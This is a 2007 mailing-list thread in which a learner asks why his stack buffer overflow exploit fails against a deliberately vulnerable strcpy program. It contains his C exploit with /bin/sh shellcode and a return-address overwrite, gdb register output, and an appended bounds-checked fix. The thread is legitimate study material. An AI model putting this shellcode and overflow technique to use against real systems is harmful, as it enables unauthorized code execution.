Security Basics mailing list archives

RE: stack overflow help ..


From: gaurav saha <gauravsaha007 () yahoo com>
Date: Sun, 28 Jan 2007 03:43:44 -0800 (PST)

yes I read ..

if I write 4 more bytes.. it overwrites the *saved*
EIP.. right??


========= vul1.c ========
[root@winmitm ~]# more a1.c
#include <string.h>

/* copies its argument into a fixed 1024-byte stack buffer with no length check */
void f(char *str) {
         char a[1024];
         strcpy(a,str);
}
int main(int argc,char *argv[]) {
         if(argc>1) f(argv[1]);
         return 0;
}

====== end of code ===


my exploit code which I wrote for this was..

===== exploit1.c ======

#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* execl() */

#define lv_size  1024
#define offset     30+lv_size+8*4

long get_sp()
{
  __asm__("movl %esp, %eax");
}

int  main(int argc, char **argv)
{
 char execshell[] =
         "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
         "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
         "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

  char buffer[lv_size+4*8];
  unsigned long *ptr2 = NULL;
  char           *ptr = NULL;
  int           i;

printf("1..\n");
 // Filling with null
  for(i=0;i<lv_size+4*8;i++)
   buffer[i]=0x00;
   ptr=buffer;

printf("2..\n");
// Filling with NOPs
  for(i=0;i<lv_size-strlen(execshell);i++)
   *(ptr++)=0x90;

printf("3..\n");
// Filling with shellcode
 for(i=0;i<strlen(execshell);i++)
   *(ptr++)=execshell[i];

printf("4..\n");
// ptr2 pointing to ptr
  ptr2=(long *)ptr;

printf("5..\n");
// Filling with address
  for(i=1;i<2;i++)
   *(ptr2++)=get_sp()+offset;

execl("/root/vul1", "vul1", buffer, NULL);

}

======== end of my exploit code =======

[root@winmitm ~]# cc expl1.c -o exploit
[root@winmitm ~]# ./exploit
1..
2..
3..
4..
5..
get_sp=bfffe568 and len=4
get_sp+offset=bfffe9a6 and len=4
6..
buffer:<�^^
           3VV45V4N
                  
�3��/bin/sh�>
[root@winmitm ~]#

this is what I get... can you please guide me on what I
am doing wrong??

thanks 
----gaurav
--- "Krpata, Tyler" <tkrpata () bjs com> wrote:

Do an "info frame" in gdb. Remember that you are trying, actually, to
overwrite the *saved* EIP value.


-----Original Message-----
From: listbounce () securityfocus com
[mailto:listbounce () securityfocus com]
On Behalf Of gaurav saha
Sent: Thursday, January 25, 2007 6:27 PM
To: security-basics () securityfocus com
Subject: stack overflow help ..

Hi,
I am new to this stack overflow issue.

I am using fc3 (kernel 2.6.12-1.1381)

I have modified these few sysctl keys to these
values.

kernel.overflowgid = 0
kernel.overflowuid = 0
fs.overflowgid = 0
fs.overflowuid = 0
kernel.randomize_va_space = 0


I am still unable to overwrite EIP

========= vuln1.c ===========
#include <string.h>

/* argv[1] is copied into a 1024-byte stack buffer with no length check */
int main(int argc, char **argv)
{
        char buf[1024];
        strcpy(buf, argv[1]);
        return 0;
}
====== end of vuln1.c =======

$gcc -ggdb vuln1.c -o v1
$gdb ./v1
.
.
.
.
(gdb) run `perl -e 'print "A"x1024'`
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1024'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xb5c000
(no debugging symbols found)...(no debugging symbols found)...
Program exited with code 0120.
(gdb) run `perl -e 'print "A"x1028'`
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1028'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x247000
(no debugging symbols found)...(no debugging symbols found)...
Program exited with code 0100.
(gdb) run `perl -e 'print "A"x1036'`
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1036'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x807000
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x00ac8e0d in __libc_start_main () from /lib/tls/libc.so.6
(gdb) info reg
.
.
ebx            0xbdaff4 12431348
esp            0xbffff350       0xbffff350
ebp            0x41414141       0x41414141
esi            0xbffff3d4       -1073744940
edi            0xbffff360       -1073745056
eip            0xac8e0d 0xac8e0d
eflags         0x210286 2163334
.
.
(gdb) run `perl -e 'print "A"x1040'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141       0x41414141
eip            0x80483a2        0x80483a2
(gdb) run `perl -e 'print "A"x1044'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141       0x41414141
eip            0x80483a2        0x80483a2
(gdb) run `perl -e 'print "A"x1048'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141       0x41414141
eip            0x80483a2        0x80483a2
(gdb) run `perl -e 'print "A"x1052'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141       0x41414141
eip            0x80483a2        0x80483a2
(gdb) run `perl -e 'print "A"x1056'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141       0x41414141
eip            0x80483a2        0x80483a2

and this keeps continuing... no matter how much I
increase it...
and I can't figure out what the problem is...

thanks and adieu
----gaurav









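As an added example that is not code from this thread: the strcpy() in vul1.c and vuln1.c writes argv[1] into a 1024-byte stack array with no length check, which is what lets a 1024-byte or longer argument run into the saved frame data seen as ebp=0x41414141 above. The hardened form below keeps the same buffer and argument handling but refuses input that does not fit; copy_bounded, f_bounded and BUF_SIZE are hypothetical names chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Same buffer size as a[1024] / buf[1024] in the thread's programs. */
#define BUF_SIZE 1024

/* Copy str into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if it would overflow; on -1 dst is untouched. */
int copy_bounded(char *dst, size_t dst_size, const char *str)
{
    size_t len = strlen(str);
    if (dst_size == 0 || len >= dst_size)   /* need one byte for the NUL */
        return -1;
    memcpy(dst, str, len + 1);              /* len + 1 <= dst_size: in bounds */
    return 0;
}

/* Hardened replacement for f() in vul1.c (hypothetical name).
 * Returns the number of bytes stored, or -1 if the input was rejected. */
int f_bounded(const char *str)
{
    char a[BUF_SIZE];
    if (copy_bounded(a, sizeof a, str) != 0)
        return -1;
    return (int)strlen(a);
}

int main(int argc, char *argv[])
{
    if (argc > 1 && f_bounded(argv[1]) < 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

With this check in place the 1024-byte and longer arguments from the gdb session are rejected before anything is written, so neither ebp nor the saved return address can be reached.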

